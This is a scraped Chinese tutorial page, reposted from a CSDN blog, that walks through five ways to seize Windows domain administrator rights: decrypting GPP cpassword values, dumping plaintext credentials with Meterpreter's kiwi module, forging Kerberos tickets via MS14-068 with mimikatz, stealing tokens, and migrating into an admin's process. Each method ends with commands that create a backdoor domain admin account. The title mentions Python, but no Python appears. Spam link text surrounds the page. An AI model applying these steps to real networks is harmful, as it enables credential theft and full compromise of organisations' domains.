激情久久久_欧美视频区_成人av免费_不卡视频一二三区_欧美精品在欧美一区二区少妇_欧美一区二区三区的

腳本之家,腳本語(yǔ)言編程技術(shù)及教程分享平臺(tái)!
分類導(dǎo)航

Python|VBS|Ruby|Lua|perl|VBA|Golang|PowerShell|Erlang|autoit|Dos|bat|

服務(wù)器之家 - 腳本之家 - Python - Python安全獲取域管理員權(quán)限幾種方式操作示例

Python安全獲取域管理員權(quán)限幾種方式操作示例

2022-01-25 00:03Bypass-- Python

在不考慮直接攻擊域控的情況下,如何快速獲取域管理員權(quán)限呢?本文分享幾種常見(jiàn)的獲取域管理員權(quán)限的方式,有需要的朋友可以借鑒參考下

在大多數(shù)情況下,攻擊者可以通過(guò)定位域管理員所登錄的服務(wù)器,利用漏洞獲取服務(wù)器system權(quán)限,找到域管理的賬號(hào)、進(jìn)程或是身份驗(yàn)證令牌,從而獲取域管理員權(quán)限

 

第1種方式:利用GPP漏洞獲取域管理權(quán)限

SYSVOL是域內(nèi)的共享文件夾,用來(lái)存放登錄腳本、組策略腳本等信息。當(dāng)域管理員通過(guò)組策略修改密碼時(shí),在腳本中引入用戶密碼,就可能導(dǎo)致安全問(wèn)題。

(1)訪問(wèn)SYSVOL共享文件夾,搜索包含“cpassword”的XML文件,獲取AES加密的密碼。

Python安全獲取域管理員權(quán)限幾種方式操作示例

(2)使用kali自帶的gpp-decrypt進(jìn)行破解,從而獲取域賬號(hào)密碼,直接登錄域管理員賬號(hào)獲取訪問(wèn)權(quán)限。

Python安全獲取域管理員權(quán)限幾種方式操作示例

 

第2種方式:獲取服務(wù)器明文登錄密碼

使用kiwi模塊需要system權(quán)限,所以我們?cè)谑褂迷撃K之前需要將當(dāng)前MSF中的shell提升為system。提到system有兩個(gè)方法,一是當(dāng)前的權(quán)限是administrator用戶,二是利用其它手段先提權(quán)到administrator用戶。然后administrator用戶可以直接getsystem到system權(quán)限。

meterpreter > getuid
Server username: BYPASS-E97BA3FC\Administrator
meterpreter > getsystem 
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

加載kiwi模塊

load kiwi

列舉系統(tǒng)中的明文密碼

creds_all

Python安全獲取域管理員權(quán)限幾種方式操作示例

 

第3種方式:使用MS14-068漏洞進(jìn)行提權(quán)

MS14068是一個(gè)能夠使普通用戶提權(quán)到域控權(quán)限的權(quán)限提升漏洞。攻擊者可以通過(guò)構(gòu)造特定的請(qǐng)求包來(lái)達(dá)到提升權(quán)限的目的。

攻擊流程:

第一步:利用MS14-068偽造生成TGT

MS14-068.exe -u bypass@test.com -p abc123! -s S-1-5-21-735015318-3972860336-672499796 -d  dc.test.com

Python安全獲取域管理員權(quán)限幾種方式操作示例

第二步:利用mimikatz將工具得到的TGT票據(jù)寫(xiě)入內(nèi)存,創(chuàng)建緩存證書(shū)

mimikatz#kerberos::ptc TGT_bypass@test.com.ccache

Python安全獲取域管理員權(quán)限幾種方式操作示例

第三步:獲取域管理員權(quán)限。創(chuàng)建一個(gè) test 賬號(hào)并加入域管理員組,從而隨時(shí)可以登錄域控主機(jī)進(jìn)行操作。

PsExec.exe \\dc cmd.exe 
// 添加test用戶
net user test abc123! /add /domain
// 把 test 用戶添加進(jìn)域管理員組
net group "domain admins"  test /add /domain
// 查看域管理員
net group "domain admins" /domain

 

第4種方式:竊取域管理員令牌

當(dāng)有域控賬戶登陸至服務(wù)器時(shí)可使用令牌模擬進(jìn)行滲透取得域控權(quán)限。

1、入侵域管理員所在的服務(wù)器,竊取域管理員的令牌,從而控制整個(gè)域。

Python安全獲取域管理員權(quán)限幾種方式操作示例

2、直接在meterpreter shell上執(zhí)行添加域管理員

add_user test abc123! -h 域控的IP地址
add_group_user "Domain Admins" test -h 域控IP地址

 

第5種方式:進(jìn)程遷移

入侵了域管理員所登錄的服務(wù)器,將進(jìn)程遷移到域管理員所運(yùn)行的進(jìn)程,就可以獲得域管理員權(quán)限。

1、獲取域管理員列表

net group "Domain Admins" /domain

Python安全獲取域管理員權(quán)限幾種方式操作示例

2、利用ps找到域管理員(TEST\bypass)所運(yùn)行的進(jìn)程,然后將shell進(jìn)程遷移到域管理員所運(yùn)行的進(jìn)程中,成功后就獲得了域管理員權(quán)限。如下圖所示:

Python安全獲取域管理員權(quán)限幾種方式操作示例

3、輸入shell命令獲取OS shell,在本機(jī)上使用Windows命令添加新的域管理員:

// 添加test用戶
net user test admin@123 /add /domain
// 把 test 用戶添加進(jìn)域管理員組
net group "domain admins"  test /add /domain

4、成功添加了域管理員賬號(hào)test。

Python安全獲取域管理員權(quán)限幾種方式操作示例

以上就是Python安全獲取域管理員權(quán)限幾種方式操作示例的詳細(xì)內(nèi)容,更多關(guān)于Python獲取域管理員權(quán)限方式的資料請(qǐng)關(guān)注服務(wù)器之家其它相關(guān)文章!

原文鏈接:https://blog.csdn.net/qq_23936389/article/details/120714817

延伸 · 閱讀

精彩推薦
主站蜘蛛池模板: 成人一级免费 | 蜜桃视频在线免费观看 | 免费一级高清毛片 | 牛牛视频在线 | 免费在线观看国产 | 2019中文字幕在线播放 | 天天碰天天操 | 99久久久精品免费观看国产 | 亚洲一级簧片 | www.com香蕉 | 国产精品99久久久久久大便 | 久久久久久久久久一本门道91 | 最近免费观看高清韩国日本大全 | 精国产品一区二区三区四季综 | 午夜精品一区二区三区免费 | 91中文在线| 国产羞羞视频 | 性盈盈盈影院 | 免费一级在线 | 精品国产一区二区亚洲人成毛片 | 亚洲午夜国产 | 久久久久国产精品久久久久 | 久久欧美亚洲另类专区91大神 | 草b视频在线观看 | 国产自91精品一区二区 | 亚洲第一页视频 | 中文字幕在线观看91 | 久久久一区二区三区精品 | 亚洲午夜一区二区三区 | 欧美成年性h版影视中文字幕 | 亚洲特黄| 午夜精品一区二区三区免费 | 成人毛片网站 | 精品久久久久久久久久中文字幕 | 亚洲精品一区中文字幕 | av免费在线网站 | 女人一区二区三区 | 欧美视频网| 亚洲视频在线网 | 久久亚洲精品国产一区 | 精品国产一区二区三区久久久蜜 |